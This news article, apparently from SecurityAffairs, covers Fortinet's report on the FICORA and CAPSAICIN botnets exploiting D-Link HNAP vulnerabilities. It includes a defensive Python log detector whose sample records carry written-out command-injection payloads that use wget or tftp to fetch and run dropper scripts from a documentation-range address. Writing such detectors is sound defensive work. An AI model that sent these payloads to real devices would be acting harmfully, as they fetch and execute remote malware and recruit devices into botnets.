Experts issue warning about increase in FICORA and Kaiten botnet activity

FortiGuard Labs researchers have recently detected a notable increase in activity involving two botnets known as “FICORA” and “CAPSAICIN.” The Mirai variant “FICORA” and the Kaiten variant “CAPSAICIN” have been particularly active, targeting vulnerabilities in D-Link devices through the Home Network Administration Protocol (HNAP) interface to achieve remote command execution. These botnets have exploited vulnerabilities such as CVE-2015-2051, CVE-2019-10891, CVE-2022-37056, and CVE-2024-33112 to compromise target devices.

According to a report published by Fortinet, the continued propagation of these botnets can be attributed to attackers reusing older, already-patched attacks. The researchers noted that the “FICORA” campaign, which hit numerous countries, appeared opportunistic and broadly distributed rather than the result of specific targeted attacks. By contrast, the “CAPSAICIN” botnet exhibited a burst of activity over a two-day period in late October 2024, focused primarily on East Asian countries.

The “FICORA” botnet operates by downloading and executing a shell script named “multi,” which deletes itself afterwards. The script tries several retrieval methods in turn, “wget,” “ftpget,” “curl,” and “tftp,” to fetch the bot, kills any running process whose name carries the same file extension as the downloaded payload, and then downloads and runs the bot for multiple Linux architectures. The malware’s configuration, including its command and control server domain and a unique string, is encrypted with the ChaCha20 algorithm.

In contrast, the “CAPSAICIN” botnet uses a downloader script named “bins.sh” to fetch the bot for various Linux architectures from a single IP address. Once running, the malware terminates other known bot processes to keep exclusive control of the device, then connects to its command and control server and reports the victim’s operating system details along with a unique identifier.
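The HNAP exploitation and downloader behaviour described above are easy to spot in web-server, proxy or WAF logs from the device side. The following Python is an added example written for this page, not code from Fortinet or from the botnets themselves: it classifies parsed HTTP requests by looking for shell metacharacters in the SOAPAction header or body of a /HNAP1/ call (the CVE-2015-2051 injection pattern), for a fetch tool followed by an IPv4 literal (wget, ftpget, curl, tftp, the methods the “multi” script cycles through), and for the two script names the report attributes to the botnets. The field names, the `classify`/`scan` functions and the sample records are assumptions constructed for illustration; the addresses are RFC 5737 documentation ranges.

```python
"""Flag HTTP requests that look like HNAP command-injection attempts
against D-Link devices, plus the follow-on remote-fetch behaviour the
article describes.  Added example: the field names and sample records
below are constructed for illustration, not taken from the report."""
import re
from typing import Dict, List

# Shell metacharacters that have no business inside a SOAPAction value
# or an HNAP request body.
SHELL_META = re.compile(r"[;`|&]|\$\(")

# A fetch tool named in the article ("multi" cycles through wget, ftpget,
# curl and tftp) followed within 80 characters by an IPv4 literal.
REMOTE_FETCH = re.compile(
    r"\b(?:wget|curl|tftp|ftpget)\b.{0,80}?\b\d{1,3}(?:\.\d{1,3}){3}\b"
)

# Downloader script names the article attributes to each botnet.
DROPPER_NAME = re.compile(r"\b(?:multi|bins\.sh)\b")


def classify(req: Dict[str, str]) -> List[str]:
    """Return the detection labels that apply to one parsed HTTP request.

    `req` uses constructed keys: src, method, path, soapaction, body.
    """
    findings: List[str] = []
    path = req.get("path", "")
    soap = req.get("soapaction", "")
    body = req.get("body", "")
    is_hnap = path.upper().startswith("/HNAP1")

    if is_hnap and SHELL_META.search(soap):
        # CVE-2015-2051-style injection: the command rides in the
        # SOAPAction header of a GetDeviceSettings call.
        findings.append("hnap_soapaction_injection")
    if is_hnap and SHELL_META.search(body):
        findings.append("hnap_body_injection")
    if REMOTE_FETCH.search(soap + " " + body):
        findings.append("remote_fetch")
    if DROPPER_NAME.search(soap + " " + body):
        findings.append("known_dropper_name")
    return findings


def scan(records: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Run classify() over a batch and keep only the requests that hit."""
    hits: List[Dict[str, object]] = []
    for req in records:
        labels = classify(req)
        if labels:
            hits.append({"src": req.get("src", "?"),
                         "path": req.get("path", ""),
                         "labels": labels})
    return hits


# Constructed sample records (RFC 5737 documentation addresses).
SAMPLE_REQUESTS: List[Dict[str, str]] = [
    {   # legitimate HNAP call from a LAN management client
        "src": "192.168.1.10", "method": "POST", "path": "/HNAP1/",
        "soapaction": "\"http://purenetworks.com/HNAP1/GetDeviceSettings\"",
        "body": "<GetDeviceSettings xmlns=\"http://purenetworks.com/HNAP1/\"/>",
    },
    {   # injection in the SOAPAction header, fetching the FICORA script
        "src": "203.0.113.7", "method": "POST", "path": "/HNAP1/",
        "soapaction": "\"http://purenetworks.com/HNAP1/GetDeviceSettings/"
                      "`cd /tmp; wget http://198.51.100.23/multi; sh multi`\"",
        "body": "",
    },
    {   # ordinary web traffic, not HNAP
        "src": "192.168.1.22", "method": "GET", "path": "/index.html",
        "soapaction": "", "body": "",
    },
    {   # injection carried in the request body, CAPSAICIN-style script name
        "src": "203.0.113.9", "method": "POST", "path": "/HNAP1/",
        "soapaction": "\"http://purenetworks.com/HNAP1/GetDeviceSettings\"",
        "body": "<Command>cd /tmp; tftp -r bins.sh -g 198.51.100.23; "
                "sh bins.sh</Command>",
    },
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_REQUESTS):
        print(hit["src"], hit["path"], ", ".join(hit["labels"]))
```

Two caveats when turning this into a production rule: `&` in SHELL_META will fire on XML entities such as `&amp;` in legitimate HNAP bodies, so tune that character for your traffic, and the script-name match is only a weak indicator on its own since “multi” is an ordinary word; treat it as corroboration for the injection or remote-fetch hits rather than an alert by itself.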

Although the oldest of these vulnerabilities, CVE-2015-2051, was disclosed and patched nearly a decade ago, the botnets exploiting them remain active and widespread worldwide. FortiGuard Labs stressed that enterprises must keep device firmware and kernels up to date and implement comprehensive monitoring to limit the spread of malware through these vulnerabilities.

The research underscores the importance of proactive security measures against persistent botnets such as “FICORA” and “CAPSAICIN.” By patching exposed devices promptly and monitoring for exploitation attempts, organizations can reduce the likelihood of being compromised through long-known vulnerabilities.

Pierluigi Paganini
SecurityAffairs – hacking, FICORA botnet

Original Post URL: https://securityaffairs.com/172373/uncategorized/surge-ficora-kaiten-botnets.html